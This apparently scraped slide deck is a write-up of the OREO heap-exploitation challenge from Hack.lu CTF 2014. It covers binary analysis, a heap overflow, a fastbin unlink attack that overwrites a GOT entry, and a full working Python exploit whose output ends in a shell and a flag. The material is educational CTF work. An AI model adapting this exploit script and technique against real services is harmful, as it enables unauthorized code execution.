![Welcome to the OREO Original Rifle Ecommerce Online System!
,______________________________________
|_________________,----------._ [____] -,__ __....-----=====
(_(||||||||||||)___________/ |
`----------' OREO [ ))"-, |
"" `, _,--....___ |
`/ """"
What would you like to do?
1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action: 1
Rifle name: hogehoge
Rifle description: sample rifle
Action: 2
Rifle to be ordered:
===================================
Name: hogehoge
Description: sample rifle
===================================
Action:](https://image.slidesharecdn.com/hacklu2014oreo-160907091609/85/OREO-Hack-lu-CTF-2014-3-320.jpg)
![oreo.py
s, f = sock("wildwildweb.fluxfingers.net", 1414)
got_malloc = 0x0804A244
got_strlen = 0x0804A250
p_order_msg = 0x0804A2A8
rifle_count = 0
ready_action()
cmd_add("A"*27+p(got_malloc-0x19), "B"*25)
libc_malloc = u(cmd_show()[1][0][:4])
print("[*] got libc malloc: 0x%08x" % libc_malloc)
libc_system = libc_malloc - 0x0007d950 + 0x00042af0
print("[*] got libc system: 0x%08x" % libc_system)
while rifle_count < 0x3e:
cmd_add("A"*27+p(0), "B")
cmd_add("A", "B")
cmd_order()
cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B")
cmd_add("A", "B")
cmd_add("A", p(got_strlen))
cmd_msg(p(libc_system) + ";shx00", noread=True)
print("[*] got shell")
shell(s)](https://image.slidesharecdn.com/hacklu2014oreo-160907091609/85/OREO-Hack-lu-CTF-2014-29-320.jpg)
![$ python oreo.py
[*] rifle count: 0x01
[*] got libc malloc: 0xf76a2950
[*] got libc system: 0xf7667af0
[*] rifle count: 0x02
[*] rifle count: 0x03
(snip.)
[*] rifle count: 0x3f
[*] ordered
[*] rifle count: 0x40
[*] rifle count: 0x41
[*] rifle count: 0x42
[*] got shell
ls
fl4g oreo
cat fl4g
flag{FASTBINS_ARE_NICE_ARENT_THEY}](https://image.slidesharecdn.com/hacklu2014oreo-160907091609/85/OREO-Hack-lu-CTF-2014-30-320.jpg)
OREO - Hack.lu CTF 2014
- 1. OREO Hack.lu CTF 2014 - Exploiting 400 points you0708@YOKARO-MON
- 2. The Original Rifle Company has the most finest rifles and revolvers in whole Rodeo City! However their buildings are pretty secure, so your only chance to get into their offices is by hacking through the Original Rifle Ecommerce Online (OREO) System and steal all those pretty weapons from the inside! Makes sense right? Good luck! nc wildwildweb.fluxfingers.net 1414
- 3. Welcome to the OREO Original Rifle Ecommerce Online System! ,______________________________________ |_________________,----------._ [____] -,__ __....-----===== (_(||||||||||||)___________/ | `----------' OREO [ ))"-, | "" `, _,--....___ | `/ """" What would you like to do? 1. Add new rifle 2. Show added rifles 3. Order selected rifles 4. Leave a Message with your Order 5. Show current stats 6. Exit! Action: 1 Rifle name: hogehoge Rifle description: sample rifle Action: 2 Rifle to be ordered: =================================== Name: hogehoge Description: sample rifle =================================== Action:
- 4. Analysis
- 5. Surface Analysis • file • ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, stripped • checksec • CANARY : ENABLED • FORTIFY : disabled • NX : ENABLED • PIE : disabled • RELRO : disabled
- 6. Dynamic Analysis • We can order rifles 1. Select rifles you want to order • Need to specify rifle name & description 2. Submit an order for selected rifles • Can leave a message
- 7. Static Analysis • Reverse engineering using IDA
- 8. • Data structure of the rifle Static Analysis
- 9. Static Analysis • aa_rifle (Size = 0x38) Offset Size Name 0x00 0x19 description 0x19 0x1B name 0x34 4 last Fastbins
- 10. Reference: Heap Chunk • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
- 11. Reference: Heap Chunk • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
- 12. Understanding Rifle Management using GDB • After adding 2 rifles • After order size + flag, fd, bk “A” “a” “b”“B” It can be found from 0x0804A288 that stores address of last rifle
- 13. • After adding 2 rifles Heap Chunk 2 Chunk 1 Understanding Rifle Management Rifle 2 0x00000041 (size + flag) (prev size) Rifle 1 description name 0 0x00000041 (size + flag) (prev size) description name address of Rifle 1
- 14. • After order Heap Chunk 2 Chunk 1 Understanding Rifle Management 0x00000041 (size + flag) (prev size) 0x00000041 (size + flag) (prev size) 0x00000000 (fd) 0x00000000 (bk) address of Chunk 2 (fd) 0x00000000 (bk)
- 15. Vulnerability • Add command 1. Alloc 0x38 bytes heap (new rifle) 2. Connect to previous rifle 3. Input rifle’s name (max 0x38 bytes) 4. Input rifle’s description (max 0x38 bytes) 5. Add rifle counter
- 16. Vulnerability • You can do buffer-overflow as below Rifle description name last “A” * 0x38
- 18. Exploitation
- 19. Memory Leakage • Overwrite last rifle address Heap Chunk 1 Rifle 1 description name 0 0x41 (size + flag) (prev size) Target data You can read target data as rifle’s description using show command “A” * 0x1B + address of target data
- 20. Fastbins Unlink Attack • Breaking fastbins chain Heap Freed Chunk 2 Reallocated Chunk 1 0x42 (size + flag) (prev size) 0x41 (size + flag) (prev size) address of Chunk 1 bk Rifle 3 description name 0 “A” * 0x1F + 0 + 0 + 0x41 + address of target memory Target memory It used as a heap chunk after re- allocating Chunk 2 Add a rifle after free 2 rifles
- 21. Reference: Fastbins Unlink Attack • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200 To avoid size check failure, you have to put a correct value into “size” (In this case, the value must be 0x41)
- 22. Making Fake Freed Chunk • You have to find the area that can be set to 0x41 when re-allocation Chunk 0x41 (size + flag) (prev size) fd bk You can use 0x804A2A0 as a freed chunk because rifle_counter can be set 0x41
- 23. Exploitation Process 1. Leak address of ibc functions 2. Calc address of “system” 3. Add rifles until rifle counter is 0x3F 4. Order rifles (free fastbins) 5. Breaking fastbins chain by adding a rifle 6. Allocate 0x804A2A0 as a heap chunk by adding a rifle 7. Overwrite GOT by leaving message 8. Get shell
- 24. Exploitation Process 2. Calc address of “system” • See http://pastebin.com/9vq38BYH
- 25. Exploitation Process 3. Add rifles until rifle counter is 0x3F 4. Order rifles (Free fastbins) while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B") cmd_add("A", "B") cmd_order() To avoid to create many fast chunks, the “last” should be 0x00000000
- 26. Exploitation Process 6. Allocate 0x804A2A0 as a heap chunk by adding a rifle • Before allocation, rifle counter will be 0x41 • Its description must be addr of strlen@got Address Before After 0x804A2A0 orderd_counter prev_size 0x00000000 0x804A2A4 rifle_counter size + flag 0x00000041 0x804A2A8 lpMsg description address of strlen@got 0x804a2c1 msg_buf + 1 name “foobar" 0x804a2dc msg_buf + 0x1C last Unknown strlen@got is will be call the program after adding a rifle/leaving a message
- 27. Exploitation Process 7. Overwrite strlen@got by leaving a message • Now lpMsg points to strlen@got • Message should be p(libc_system) + “;sh x00" • “;shx00" will be used in next step
- 28. Exploitation Process 8. Get shell • Overwrote strlen will be called after adding the rifle • Its argument is the message: p(libc_system) + “;shx00” • It means the program will call system(“x??x??x??x??;sh”)
- 29. oreo.py s, f = sock("wildwildweb.fluxfingers.net", 1414) got_malloc = 0x0804A244 got_strlen = 0x0804A250 p_order_msg = 0x0804A2A8 rifle_count = 0 ready_action() cmd_add("A"*27+p(got_malloc-0x19), "B"*25) libc_malloc = u(cmd_show()[1][0][:4]) print("[*] got libc malloc: 0x%08x" % libc_malloc) libc_system = libc_malloc - 0x0007d950 + 0x00042af0 print("[*] got libc system: 0x%08x" % libc_system) while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B") cmd_add("A", "B") cmd_order() cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B") cmd_add("A", "B") cmd_add("A", p(got_strlen)) cmd_msg(p(libc_system) + ";shx00", noread=True) print("[*] got shell") shell(s)
- 30. $ python oreo.py [*] rifle count: 0x01 [*] got libc malloc: 0xf76a2950 [*] got libc system: 0xf7667af0 [*] rifle count: 0x02 [*] rifle count: 0x03 (snip.) [*] rifle count: 0x3f [*] ordered [*] rifle count: 0x40 [*] rifle count: 0x41 [*] rifle count: 0x42 [*] got shell ls fl4g oreo cat fl4g flag{FASTBINS_ARE_NICE_ARENT_THEY}
- 31. Thank you!